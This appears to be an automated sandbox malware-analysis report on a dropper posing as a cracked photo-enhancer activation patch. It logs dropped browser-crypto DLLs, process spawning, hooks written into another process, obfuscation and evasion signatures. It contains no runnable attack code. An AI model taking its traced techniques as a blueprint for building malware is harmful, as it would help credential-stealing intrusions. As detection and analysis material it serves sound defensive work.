Source: KbqArOlW06.exe, 00000000.00000002.469170712.0000000001122000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameA1Photo-&-Art-Enhancer_Search&Patch_Activation.exe vs KbqArOlW06.exe
Source: KbqArOlW06.exe, 00000000.00000002.472580658.0000000001B9B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs KbqArOlW06.exe
Source: KbqArOlW06.exe Binary or memory string: OriginalFilenameA1Photo-&-Art-Enhancer_Search&Patch_Activation.exe vs KbqArOlW06.exe
Source: KbqArOlW06.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\KbqArOlW06.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\KbqArOlW06.exe.log Jump to behavior
Source: classification engine Classification label: mal60.troj.spyw.evad.winEXE@7/13@0/1
Source: C:\Users\user\Desktop\KbqArOlW06.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_0040A10C FindResourceA,SizeofResource,LoadResource,LockResource, 21_2_0040A10C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization Jump to behavior
Source: KbqArOlW06.exe Virustotal: Detection: 26%
Source: KbqArOlW06.exe Metadefender: Detection: 28%
Source: KbqArOlW06.exe ReversingLabs: Detection: 69%
Source: C:\Users\user\Desktop\KbqArOlW06.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\KbqArOlW06.exe "C:\Users\user\Desktop\KbqArOlW06.exe"
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe "C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe"
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process created: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe "C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Process created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp "C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe "C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe" Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process created: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe "C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Process created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp "C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe" Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_00409920 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 21_2_00409920
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00455E14 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 22_2_00455E14
Source: C:\Users\user\Desktop\KbqArOlW06.exe File created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0045663C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA, 22_2_0045663C
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: KbqArOlW06.exe Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
Source: C:\Users\user\Desktop\KbqArOlW06.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Mutant created: \Sessions\1\BaseNamedObjects\CCOYS///hdr
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe String found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Window found: window name: TSelectLanguageForm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: KbqArOlW06.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: KbqArOlW06.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: KbqArOlW06.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: KbqArOlW06.exe Static file information: File size 12978176 > 1048576
Source: KbqArOlW06.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0xc51c00
Source: KbqArOlW06.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: freebl3.pdb source: freebl3.dll.16.dr
Source: Binary string: mozglue.pdb@+ source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr
Source: Binary string: nss3.pdb source: 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: mozglue.pdb source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.16.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.16.dr

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: KbqArOlW06.exe, ???????????????????.cs .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Obfuscated command line found
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Process created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp "C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Process created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp "C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe" Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_00406A50 push 00406A8Dh; ret 21_2_00406A85
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_004040B5 push eax; ret 21_2_004040F1
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_00404185 push 00404391h; ret 21_2_00404389
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_00404206 push 00404391h; ret 21_2_00404389
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_004042E8 push 00404391h; ret 21_2_00404389
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_00404283 push 00404391h; ret 21_2_00404389
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_004093EC push 0040941Fh; ret 21_2_00409417
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_004085B8 push ecx; mov dword ptr [esp], eax 21_2_004085BD
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00409DDC push 00409E19h; ret 22_2_00409E11
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0041A0B8 push ecx; mov dword ptr [esp], ecx 22_2_0041A0BD
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00452194 push ecx; mov dword ptr [esp], eax 22_2_00452199
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_004062CC push ecx; mov dword ptr [esp], eax 22_2_004062CD
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0040A2DF push ds; ret 22_2_0040A2E0
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_004605AC push ecx; mov dword ptr [esp], ecx 22_2_004605B0
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00458848 push 00458880h; ret 22_2_00458878
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00410970 push ecx; mov dword ptr [esp], edx 22_2_00410975
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00412DB8 push 00412E1Bh; ret 22_2_00412E13
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0040D2C8 push ecx; mov dword ptr [esp], edx 22_2_0040D2CA
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0040546D push eax; ret 22_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0040553D push 00405749h; ret 22_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_004055BE push 00405749h; ret 22_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0040563B push 00405749h; ret 22_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_004056A0 push 00405749h; ret 22_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0040F828 push ecx; mov dword ptr [esp], edx 22_2_0040F82A
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00443930 push ecx; mov dword ptr [esp], ecx 22_2_00443934
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00487AF0 push ecx; mov dword ptr [esp], ecx 22_2_00487AF5
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00459B60 push 00459BA4h; ret 22_2_00459B9C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00497B18 push ecx; mov dword ptr [esp], ecx 22_2_00497B1D
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00479C7C push ecx; mov dword ptr [esp], edx 22_2_00479C7D
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00451FD0 push 00452003h; ret 22_2_00451FFB
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00450A28 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 22_2_00450A28
PE file contains sections with non-standard names
Source: 2.0.0-beta2.cps.exe.0.dr Static PE information: section name: .2vB
Source: 2.0.0-beta2.cps.exe.0.dr Static PE information: section name: .a|D
Source: 2.0.0-beta2.cps.exe.0.dr Static PE information: section name: .=xC
Source: nss3.dll.16.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.16.dr Static PE information: section name: .didat
Source: mozglue.dll.16.dr Static PE information: section name: .00cfg
Source: freebl3.dll.16.dr Static PE information: section name: .00cfg
Source: softokn3.dll.16.dr Static PE information: section name: .00cfg
Source: sqlite3.dll.16.dr Static PE information: section name: /4
Source: sqlite3.dll.16.dr Static PE information: section name: /19
Source: sqlite3.dll.16.dr Static PE information: section name: /31
Source: sqlite3.dll.16.dr Static PE information: section name: /45
Source: sqlite3.dll.16.dr Static PE information: section name: /57
Source: sqlite3.dll.16.dr Static PE information: section name: /70
Source: sqlite3.dll.16.dr Static PE information: section name: /81
Source: sqlite3.dll.16.dr Static PE information: section name: /92
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .=xC
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe File created: C:\Users\user\AppData\LocalLow\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\KbqArOlW06.exe File created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe File created: C:\Users\user\AppData\LocalLow\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe File created: C:\Users\user\AppData\LocalLow\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe File created: C:\Users\user\AppData\LocalLow\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe File created: C:\Users\user\AppData\LocalLow\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe File created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe File created: C:\Users\user\AppData\LocalLow\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\KbqArOlW06.exe File created: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp File created: C:\Users\user\AppData\Local\Temp\is-Q7MJ8.tmp\_isetup\_setup64.tmp Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Memory written: PID: 2332 base: 960005 value: E9 FB 99 A8 76 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Memory written: PID: 2332 base: 773E9A00 value: E9 0A 66 57 89 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Memory written: PID: 2332 base: 980007 value: E9 7B 4C AA 76 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Memory written: PID: 2332 base: 77424C80 value: E9 8E B3 55 89 Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0042409C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 22_2_0042409C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0042409C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 22_2_0042409C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00422CEC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 22_2_00422CEC
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0041815E IsIconic,SetWindowPos, 22_2_0041815E
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00418160 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 22_2_00418160
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0042466C IsIconic,SetActiveWindow,SetFocus, 22_2_0042466C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00424624 IsIconic,SetActiveWindow, 22_2_00424624
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00418814 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 22_2_00418814
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0042F75C IsIconic,GetWindowLongA,GetWindowLongA,GetActiveWindow,MessageBoxA,SetActiveWindow,GetActiveWindow,MessageBoxA,SetActiveWindow, 22_2_0042F75C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00417A28 IsIconic,GetCapture, 22_2_00417A28
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00485CFC IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 22_2_00485CFC
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0041F5A8 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 22_2_0041F5A8
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\KbqArOlW06.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
